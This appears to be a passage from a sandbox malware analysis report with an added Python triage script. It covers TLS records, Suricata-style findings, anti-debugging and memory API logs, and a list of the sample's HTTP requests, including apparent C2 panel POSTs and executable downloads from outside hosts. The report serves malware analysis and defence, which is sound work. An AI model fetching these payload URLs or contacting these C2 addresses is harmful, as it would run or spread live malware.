87.240.137.134:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1
192.168.56.103:49212
87.240.132.78:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49220
95.142.206.1:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1
192.168.56.103:49218
95.142.206.0:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1
192.168.56.103:49217
87.240.132.78:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49221
95.142.206.3:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1
192.168.56.103:49286
87.240.129.133:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49326
87.240.129.133:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49216
87.240.132.78:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49213
87.240.132.78:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49219
87.240.132.78:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49334
87.240.129.133:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49336
87.240.137.140:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1
192.168.56.103:49234
104.26.8.59:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65
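Working through the alert table and the TLS table above by hand is error-prone: the report prints Signature and Category with nothing but a space between them, and each TLS record is spread over four lines. The Python below is an added triage example, not part of the ZeroBOX report or its tooling. It parses both tables in the form the report renders them, separates the remote endpoints that ET MALWARE rules name (candidate C2) from rules that merely fingerprint the client, and cross-checks certificate CNs against the DNS TLD alerts. Assumptions: 192.168.56.103 is the analysis VM (as in every flow above), the category list is the set of Suricata categories that occur in this report, and the allow-list of service domains passed to unexpected_cns is the caller's judgement of what is benign infrastructure, not something the report states. The SAMPLE_* strings are a handful of rows copied from this report, not a complete export.

```python
"""Added triage helpers for the flattened Suricata alert / TLS tables of a ZeroBOX report."""
import re

ALERT_RE = re.compile(
    r"^(?P<proto>TCP|UDP) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<sid>\d+) (?P<rest>.+)$")
# Signature and Category are joined by one space, so split on the categories seen in the report.
CATEGORIES = ("Malware Command and Control Activity Detected",
              "Device Retrieving External IP Address Detected",
              "Potential Corporate Privacy Violation", "Generic Protocol Command Decode",
              "A Network Trojan was detected", "Potentially Bad Traffic", "undefined")
SANDBOX_HOST = "192.168.56.103"  # assumption: the analysis VM seen in every flow

def parse_alerts(text):
    """Parse 'PROTO src:port -> dst:port SID Signature Category' rows."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line.strip())
        if not m:
            continue  # header, blank or foreign line
        a = m.groupdict()
        rest = a.pop("rest")
        cat = next((c for c in CATEGORIES if rest.endswith(" " + c)), "unknown")
        a["signature"], a["category"] = (rest[: -len(cat) - 1] if cat != "unknown" else rest), cat
        a["sid"], a["sport"], a["dport"] = int(a["sid"]), int(a["sport"]), int(a["dport"])
        # Remote endpoint regardless of direction: C2 responses are inbound flows.
        a["remote"] = ((a["dst"], a["dport"]) if a["src"] == SANDBOX_HOST
                       else (a["src"], a["sport"]))
        alerts.append(a)
    return alerts

def c2_candidates(alerts):
    """Distinct remote ip:port pairs named by ET MALWARE signatures."""
    return sorted({a["remote"] for a in alerts if a["signature"].startswith("ET MALWARE")})

def hosts_for_sid(alerts, sid):
    """Distinct remote hosts one SID fired on; many unrelated hosts => client-side fingerprint."""
    return sorted({a["remote"][0] for a in alerts if a["sid"] == sid})

def parse_tls(text):
    """Parse 4-line TLS records: version / src / dst / 'issuer subject sha1'."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    records, i = [], 0
    while i + 3 < len(lines):
        if not lines[i].startswith("TLSv"):
            i += 1
            continue
        version, src, dst, detail = lines[i:i + 4]
        dn, fingerprint = detail.rsplit(" ", 1)
        # Inside a DN each attribute follows ', '; the issuer/subject boundary is the one
        # space before C=/CN= that is not preceded by a comma.
        parts = re.split(r"(?<=[^,]) (?=CN?=)", dn, maxsplit=1)
        issuer, subject = parts if len(parts) == 2 else ("", dn)
        cn = re.search(r"CN=([^,]+)", subject)
        records.append({"version": version, "src": src, "dst": dst, "issuer": issuer,
                        "subject": subject, "cn": cn.group(1) if cn else "",
                        "fingerprint": fingerprint})
        i += 4
    return records

def unexpected_cns(records, allow):
    """Certificate CNs outside the caller's allow-list of expected service domains."""
    def allowed(cn):
        return any(cn == d or cn.endswith("." + d) for d in allow)
    return sorted({r["cn"] for r in records if not allowed(r["cn"])})

def tld_correlation(alerts, records):
    """Map each '*.<tld> domain' DNS alert to certificate CNs under that TLD."""
    out = {}
    for a in alerts:
        m = re.search(r"\*\.(\w+) domain", a["signature"])
        if m:
            out[m.group(1)] = sorted({r["cn"] for r in records
                                      if r["cn"].endswith("." + m.group(1))})
    return out

SAMPLE_ALERTS = """\
TCP 192.168.56.103:49167 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49163 -> 193.42.32.118:80 2045779 ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49164 -> 104.26.8.59:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.103:64178 -> 164.124.101.2:53 2016778 ET DNS Query to a *.pw domain - Likely Hostile Potentially Bad Traffic
TCP 192.168.56.103:49260 -> 176.123.9.85:16482 2046105 ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound) A Network Trojan was detected
TCP 176.123.9.85:16482 -> 192.168.56.103:49260 2046056 ET MALWARE Redline Stealer Activity (Response) A Network Trojan was detected
TCP 192.168.56.103:49242 -> 185.225.74.51:44767 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
UDP 192.168.56.103:52004 -> 164.124.101.2:53 2023883 ET DNS Query to a *.top domain - Likely Hostile Potentially Bad Traffic
"""
SAMPLE_TLS = """\
TLSv1
192.168.56.103:49171
87.240.132.78:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49186
172.67.197.101:443
C=US, O=Let's Encrypt, CN=E1 CN=preconcert.pw 60:b2:a3:3e:2f:80:57:cd:6f:c1:a3:e9:b3:c6:cb:95:41:83:4a:64
TLSv1
192.168.56.103:49164
104.26.8.59:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65
"""
```

Run over the full tables, hosts_for_sid shows why SID 906200054 (SSLBL JA3 "Tofsee") should be read as corroboration rather than as an indicator: in this report it fires against vk.com, userapi.com, Cloudflare-fronted hosts, api.myip.com and ipinfo.io alike, so it is matching the sample's TLS client stack, not any particular server. The network findings that stand on their own are the ET MALWARE-tagged RedLine flows to 176.123.9.85:16482, 185.225.73.32:44973 and 185.225.74.51:44767 (net.tcp framing on high, non-standard ports, with responses from the server side), the BeamWinHTTP GET requests to 193.42.32.118 and 45.15.156.229, and the certificate CNs that fall outside the social-network and CDN set (preconcert.pw, sergejbukotko.com, verypayment.net); preconcert.pw is also what the "*.pw domain" DNS alert resolved, which tld_correlation surfaces directly.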

Time & API | Arguments | Status | Return | Repeated

GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00843ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00843ae8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00843b68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff7e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff7e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff6e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff6e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff6e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff6e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff6e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff768
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002ff968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0089f0f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0089f0f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0089f170
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section _RDATA
section .vmp0
section .vmp1
section .vmp2
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0xb17de0
0xb17d15
0xb136fa
0xb133a6
0xb11b93
0xb11b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb17e79
registers.esp: 4254892
registers.edi: 42108140
registers.eax: 0
registers.ebp: 4254916
registers.edx: 8479584
registers.ebx: 42108160
registers.esi: 42108960
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5cd269
0x5cd06b
0x5c7ad8
0x5c72d3
0x5c3c6b
0x5c35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5cd3a0
registers.esp: 1894980
registers.edi: 1895032
registers.eax: 0
registers.ebp: 1895044
registers.edx: 2974560
registers.ebx: 1896476
registers.esi: 37226036
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xaa7800
0xaa7735
0xaa347b
0xaa3126
0xaa1b93
0xaa1b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xaa7899
registers.esp: 6615884
registers.edi: 41956584
registers.eax: 0
registers.ebp: 6615908
registers.edx: 8921200
registers.ebx: 41956604
registers.esi: 41957404
registers.ecx: 0
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://193.42.32.118/api/tracemap.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://193.42.32.118/api/firegate.php
suspicious_features Connection to IP address suspicious_request GET http://45.15.156.229/api/tracemap.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://45.15.156.229/api/firegate.php
suspicious_features Connection to IP address suspicious_request HEAD http://45.9.74.80/super.exe
suspicious_features Connection to IP address suspicious_request GET http://45.9.74.80/super.exe
request GET http://193.42.32.118/api/tracemap.php
request POST http://193.42.32.118/api/firegate.php
request HEAD http://ji.alie3ksgbb.com/m/ela205.exe
request GET http://ji.alie3ksgbb.com/m/ela205.exe
request HEAD http://marrakechchoralmeeting.ma/netTime.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request HEAD http://marrakechchoralmeeting.ma/cgi-sys/suspendedpage.cgi
request GET http://marrakechchoralmeeting.ma/netTime.exe
request GET http://marrakechchoralmeeting.ma/cgi-sys/suspendedpage.cgi
request GET http://45.15.156.229/api/tracemap.php
request POST http://45.15.156.229/api/firegate.php
request HEAD http://45.9.74.80/super.exe
request GET http://45.9.74.80/super.exe
request HEAD http://230907161118223.nmr.xrm42.top/f/fikim0907223.exe
request GET http://230907161118223.nmr.xrm42.top/f/fikim0907223.exe
request GET https://api.myip.com/
request GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
request GET https://sergejbukotko.com/7725eaa6592c80f8124e769b4e8a07f7.exe
request GET https://preconcert.pw/setup294.exe
request GET https://verypayment.net/1bc7618fb98d2d4c287a4f9d42a3529b/7725eaa6592c80f8124e769b4e8a07f7.exe
request GET https://vk.com/doc44017378_668850966?hash=seNAc9XpZGb24lXnAxVAwPiPVaSTe6IiTQaY7IFhggw&dl=A9mazd4TmUx700iSSJAZzZTPnbX30hG5PEtIhQs2FVw&api=1&no_preview=1#utube
request GET https://vk.com/doc17799268_667374166?hash=t73r7TZmjqi4mQ6K8CuchmsQ2lbq7RbjhwFx1c1Azcg&dl=HaU76slkxIDZ6fTldzxVLdSFmSzwAiccfTBkzLQsA4D&api=1&no_preview=1#u9
request GET https://psv4.userapi.com/c909518/u17799268/docs/d38/272bd98cd010/h27lmi0.bmp?extra=8E5LnE31GAfkun85y6q3JNHdEJ6rb3OS4of8U197zzjPBwzlcBmXiYtqfGEzAOOcBigBbtsjBtCJpKZMK3_lQTtjrrC6bCw4QqmXuSbFcrs-fVc_0h4X8B-FoNEyrA4yLWeFIUw2C7A5wlE2
request GET https://vk.com/doc17799268_667370950?hash=kmRsdqMou4vNz1YzodkAQZcJxKjXdXHF3v2Zycf1w2H&dl=i4K7yr2wzDFn7JZ4az5BAF7ZSXsQBGNbt8o8BOvxSaw&api=1&no_preview=1
request GET https://sun6-20.userapi.com/c237031/u17799268/docs/d44/9d7023004930/PL_Client.bmp?extra=X1aJqe75cj3wH63JyDtM4ZvEFrLEEDM9Cj69lrcSXLQLpLhAVquotaOP2hnr-i131Cw2CXTQYaZGiXrawiBA3-dvrSYSkiKl6gd5nnzy6xUssRlZdOecvfBwEwrAygIbNtWImtAz1AfD6bvt
request GET https://vk.com/doc17799268_667301259?hash=mz2nLKvo6dt1uE06v4jRORCgXO1tbK1pSlJhEfMFJco&dl=vkt89M90dzWpJZ9hvFWUTeZuZHqaxeSpP8mP7ffY8Z0&api=1&no_preview=1
request GET https://sun6-21.userapi.com/c235131/u17799268/docs/d34/0d08248537eb/d3232adg.bmp?extra=MXfyziyjTKDf6ofOrhDCTKpsWkbv10mkMTRRhYIV8JRe3R-EQTQ053o3girAdfhhnn5fc1YH_S_WsBSzGbqRuEfy-bz_PCHnGFFm2ELe6Vs13UB3lsTOyfn7GTx222_mFRvKUYaEAkS6mnss
request GET https://vk.com/doc44017378_669202180?hash=Qj8GmTTzSwexN5MiDhkzSBdsEuAfR50DxI5PmBbRzn8&dl=G49L5cNOoCw8qI3zZagSCyprvu5ngf5V9jZb6GDfmT8&api=1&no_preview=1#redcl
request GET https://sun6-20.userapi.com/c237031/u44017378/docs/d47/f53dd4d29da4/red.bmp?extra=aPmcskdA3y2ObuY7QHUX6sPMjQu36B4newP0bAW-Ly73hW3EW_bozidYJAqh73X7SUvR1gIX9uc9Cb4NNw95t2w09-_aicB8V3k2Xih1EYLcm7JY06Dr2jP135rFTycmXICkUKS8rcX-rNt7
request GET https://vk.com/doc17799268_667356691?hash=cUASNycPr9e7ejTeXRHP4JzU43t6UAQvFbVpJRIyYfL&dl=WIcfE7rh128yHk3HTd3LfM84KN7pulppjnAcRmZGByH&api=1&no_preview=1#orig
request GET https://sun6-23.userapi.com/c909218/u17799268/docs/d51/a01868bc6519/OriginalBuild.bmp?extra=ubUUt1995rM2O1vMl6qK3XtVBz9_ydnjOUtvK8odosQtYQIMBBSkvaNNKqqilClao3gbzVteXVX9L9OFNSV06NdFFhqmBwxMRWCeFMALiLTI8W6Vx3d4vHYiIZ6fNIjaj-fFlB6HwOA5YYkC
request GET https://vk.com/doc17799268_667370292?hash=3zgmNBZUEabUAWsj0zIdTPreX2uOk9XZqB04AKml9Wc&dl=3EXwtWCuOk8m89Hgrb6xTH69yK7gn8gGsiaT4sE12Ls&api=1&no_preview=1#review
request GET https://psv4.userapi.com/c909228/u17799268/docs/d27/d584128e4c13/setup.bmp?extra=QZMNAMmYW-qEHWSBh6dZ9jyKy_PY0fq3EfQW125lr8gOTPQKKk8D6XHsyvSTOD3T7PxspO6gsaXVUJbHjY4x2FlKcs3MgJmS9q6rOCgsMt-fKwYArNbdvgjxPZr2zE35GnV0uOAIllJpHWOQ
request POST http://193.42.32.118/api/firegate.php
request POST http://45.15.156.229/api/firegate.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077711810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077712810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077713810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077714810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077715810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077716810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077717810
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffffffffffff
-1073741800 0

NtAllocateVirtualMemory

process_identifier: 1460
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077718810
